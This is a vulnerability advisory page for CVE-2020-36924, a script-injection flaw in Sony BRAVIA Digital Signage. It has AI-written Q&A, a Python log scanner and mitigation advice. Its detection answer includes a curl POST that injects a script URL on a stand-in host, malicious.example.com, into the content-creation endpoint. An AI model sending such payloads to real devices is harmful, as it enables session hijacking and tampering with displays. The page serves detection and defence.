CVE-2020-36924
Remote File Inclusion in Sony BRAVIA Digital Signage Enables XSS
Publication date: 2026-01-06
Last updated on: 2026-01-06
Assigner: VulnCheck
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| sony | bravia_digital_signage | up to and including 1.7.8 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-829 | The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2020-36924 is an unauthenticated remote file inclusion vulnerability in Sony BRAVIA Digital Signage version 1.7.8 and earlier. It allows attackers to inject arbitrary client-side scripts such as JavaScript, VBScript, or HTML through the content material URL parameter when adding HTML-type content. This flaw enables attackers to execute cross-site scripting (XSS) attacks, hijack user sessions, alter the appearance of the web interface, and modify the content displayed on the signage remotely without authentication. [1, 2, 3, 4]
How can this vulnerability impact me?
Exploitation of this vulnerability can lead to session hijacking, allowing attackers to take over user sessions. Attackers can also execute cross-site scripting (XSS) attacks, which may compromise user data or perform unauthorized actions. Additionally, attackers can alter the appearance and content displayed on the digital signage, potentially causing misinformation or damaging the organization's reputation. Since the vulnerability is exploitable remotely without authentication, it poses a significant security risk to environments using Sony BRAVIA Digital Signage. [1, 2, 4]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the API endpoint `/api/content-creation?type=create&id=...` that include JSON payloads with a "material" array containing HTML type entries referencing external URLs. Such requests may indicate attempts to inject arbitrary client-side scripts. A practical detection method is to capture and analyze network traffic for these specific POST requests. For example, using curl to simulate or detect such requests: `curl -X POST -H "Content-Type: application/json" -d '{"material":[{"type":"html","url":"http://malicious.example.com/script.js"}]}' http://<target-ip>/api/content-creation?type=create&id=<id>` can test if the endpoint is vulnerable. Additionally, network monitoring tools like Wireshark or intrusion detection systems can be configured to alert on such suspicious API calls. [2, 4]
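The detection rule above, as an added example that is not part of this record: it scans request records in the shape a reverse proxy or IDS might log (assumed keys `src`, `method`, `path`, `body`) and flags content-creation POSTs whose "material" array carries an HTML entry pointing at a host outside an allow-list. The sample requests, hostnames and ids are constructed for the example.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests; addresses, ids and hostnames are made up.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "POST",
     "path": "/api/content-creation?type=create&id=42",
     "body": json.dumps({"material": [{"type": "html", "url": "http://untrusted.example/p.html"}]})},
    {"src": "10.0.0.6", "method": "POST",
     "path": "/api/content-creation?type=create&id=43",
     "body": json.dumps({"material": [{"type": "html", "url": "https://signage.internal/welcome.html"}]})},
    {"src": "10.0.0.7", "method": "POST",
     "path": "/api/content-creation?type=create&id=44",
     "body": json.dumps({"material": [{"type": "image", "url": "/local/logo.png"}]})},
    {"src": "10.0.0.8", "method": "GET", "path": "/api/content-creation?type=list", "body": ""},
    {"src": "10.0.0.9", "method": "POST",
     "path": "/api/content-creation?type=create&id=45", "body": "not json"},
]

def external_html_materials(request, trusted_hosts):
    """Return URLs of HTML-type material entries that point outside trusted_hosts
    in a content-creation POST; empty list when the request does not match."""
    if request.get("method", "").upper() != "POST":
        return []
    parts = urlsplit(request.get("path", ""))
    query = parse_qs(parts.query)
    if parts.path != "/api/content-creation" or query.get("type") != ["create"]:
        return []
    try:
        body = json.loads(request.get("body") or "")
    except ValueError:
        return []  # malformed body: not this pattern (worth logging separately)
    hits = []
    materials = body.get("material", []) if isinstance(body, dict) else []
    for entry in materials:
        if not isinstance(entry, dict) or str(entry.get("type", "")).lower() != "html":
            continue
        url = urlsplit(str(entry.get("url", "")))
        # Remote inclusion needs an absolute http(s) URL whose host is not ours.
        if url.scheme in ("http", "https") and url.hostname not in trusted_hosts:
            hits.append(entry["url"])
    return hits

def scan(requests, trusted_hosts):
    """Indices of requests matching the CVE-2020-36924 injection pattern."""
    return [i for i, r in enumerate(requests) if external_html_materials(r, trusted_hosts)]

if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS, {"signage.internal"}):
        print("ALERT", SAMPLE_REQUESTS[i]["src"], external_html_materials(SAMPLE_REQUESTS[i], {"signage.internal"}))
```

Feed it the request log your proxy or IDS already produces and populate `trusted_hosts` with the hosts that legitimately serve HTML content to the signage.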
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the Sony BRAVIA Digital Signage management interface and API endpoints to trusted networks only, implementing network-level controls such as firewalls to block unauthorized access, and monitoring for suspicious POST requests to the `/api/content-creation` endpoint. Since the vulnerability involves unauthenticated remote file inclusion via the content material URL parameter, disabling or restricting the ability to add HTML-type content remotely can reduce risk. Applying any available patches or updates from Sony is recommended if released. If patches are not available, consider isolating the affected systems from untrusted networks and reviewing content submission workflows to prevent injection of arbitrary scripts. [1, 2, 4]